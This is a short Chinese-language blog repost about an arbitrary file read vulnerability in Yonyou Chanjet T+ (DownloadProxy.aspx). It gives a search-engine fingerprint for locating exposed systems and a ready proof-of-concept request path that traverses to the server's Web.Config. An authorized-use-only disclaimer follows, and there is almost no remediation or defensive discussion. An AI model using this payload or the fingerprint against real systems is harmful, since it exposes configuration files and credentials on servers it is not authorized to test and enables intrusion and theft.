當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

發布時間：2024/3/24 编程问答 31 豆豆

生活随笔收集整理的這篇文章主要介紹了用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

用友?暢捷通T+ DownloadProxy.aspx文件存在任意文件讀取漏洞，攻擊者通過漏洞可以獲取服務器上的敏感文件

用友?暢捷通T+

app="暢捷通-TPlus"

登錄頁面

驗證POC?

/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

技術文章僅供參考，此文所提供的信息只為網絡安全人員對自己所負責的網站、服務器等（包括但不限于）進行檢測或維護參考，未經授權請勿利用文章中的技術資料對任何計算機系統進行入侵操作。利用此文所提供的信息而造成的直接或間接后果和損失，均由使用者本人負責。本文所提供的工具僅用于學習，禁止用于其他！！！
?

以上是生活随笔為你收集整理的用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。